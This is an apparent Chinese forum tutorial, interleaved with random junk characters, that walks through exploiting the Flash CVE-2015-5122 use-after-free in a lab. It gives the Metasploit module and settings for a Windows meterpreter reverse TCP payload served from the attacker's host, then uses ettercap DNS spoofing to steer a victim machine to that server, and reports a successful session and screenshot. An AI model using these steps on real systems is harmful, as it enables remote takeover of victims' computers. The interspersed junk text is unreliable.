|
( M& F; n, p6 v+ s
二、cve2015-5122漏洞实例演示虚拟机 ) x5 M& I) ?( n f3 z: H' O& c
0 a5 k" k; V5 C2 Y8 Q1 Q& U; u# F9 K' M7 q$ g. S) Z) A
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
' }* l6 u" q8 w$ M / [: s4 w8 v5 g1 M5 \$ B
& N" H4 A( g4 u/ A: E
search cve-2015-5122如图: D s% m m: t4 H( j
7 i# {; C" ^( v; A) ?6 e' h
4 {4 R* W0 r5 G% o; W/ E" ~ % z5 C6 r' h# }, ^1 S
! B5 m; T$ B$ X0 o) [5 A1 [0 t( y7 ]6 _
下面我们敲如下命令: + l, \' ^/ i( x1 A9 I* {
e4 v Q3 i. z# j/ b* `
& Y7 L7 r5 D! C) g use exploit/multi/browser/adobe_flash_opaque_background_uaf
1 R' n7 ]; Q% d5 A; q }1 w# \
q" }& g% M" ~8 @$ q- x* `1 H$ G* ]' }, p
set PAYLOAD windows/meterpreter/reverse_tcp & R! v5 | N3 }) w8 q7 \
6 S8 I: _' b3 N$ _* z& s ]3 D
1 q5 ^* y; Y0 S5 E! z3 t set LHOST 192.168.0.109 & Y5 f4 w0 Y/ A9 R
! L: {2 _4 A( {* u; U3 T
, h2 D4 q2 B: d! L2 H
set URIPATH / /*根目录*/
6 T" I) Q4 C" S9 Q
% W% r# u B4 s' d
) y' @. K% P7 A" v4 H% z5 s4 S set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 & w# ^; s3 c( n9 H/ F6 Q4 P
, E2 @: E, q: V5 l1 Q5 q$ |5 b8 @5 f6 b
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
4 ^- U* D& m. I
$ C* a+ u f( P/ Z0 D5 K$ D/ |" b& x" M8 p/ X, ^& d- g
然后show options如图:
, o+ N b" U/ O( z0 o! u
6 |# M% j8 J& W* V! r0 X
' d, J, D6 O. ?2 B. b - V0 F: ^0 t- |9 ?! m. L( v
" ]3 t+ k* L, T/ u7 V4 [5 k6 M
3 B0 ^: P6 i) H" t0 |& a6 J1 ] 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: ' {" J* Y1 O+ _' t) a2 n
& A& R& w! l6 |8 R# v: k
$ ]" D" Y/ p) L0 v s6 `
6 K/ K) |, j1 g" g2 V2 c# h2 p 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
) _$ p5 r6 l6 {( ]$ B, J. t 0 D) }. n/ E3 ^' y. U& A7 l& x2 s
3 t/ g5 x+ j; X Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
9 m( n, A8 R& X: i- V , w2 N6 {4 K' ?& ~
( {3 F2 b& E' Y ; K- n) P9 O _" A. I
3 ~# Z* _1 c: \- A, K7 H1 t6 n
" w% t+ I+ W1 K3 E4 H' ^
成功了,这时候我们断开ettercap,如图: 0 B2 t0 w3 E' c- H6 Y
* P/ e! S( X( N$ S3 {. Y8 B" v& G4 v, q0 K u+ A
9 W* n$ ?6 Y7 `% {9 M! d4 k
; i6 H1 h# [' E( Q) o5 G# j9 A3 C$ o
- a* D% O8 A, X+ n Screenshot如图: - F# J8 q7 u+ n% _3 ~! v
7 u! O$ [0 _2 z' v* \$ `2 }$ X5 I. L7 g: u% ~2 G
$ ~! ^: `5 E' S0 a
- N/ V z8 H( K8 t6 f/ ^: x
# U! V0 r9 Q' W) ~) M . f o1 @1 ^) C3 x
|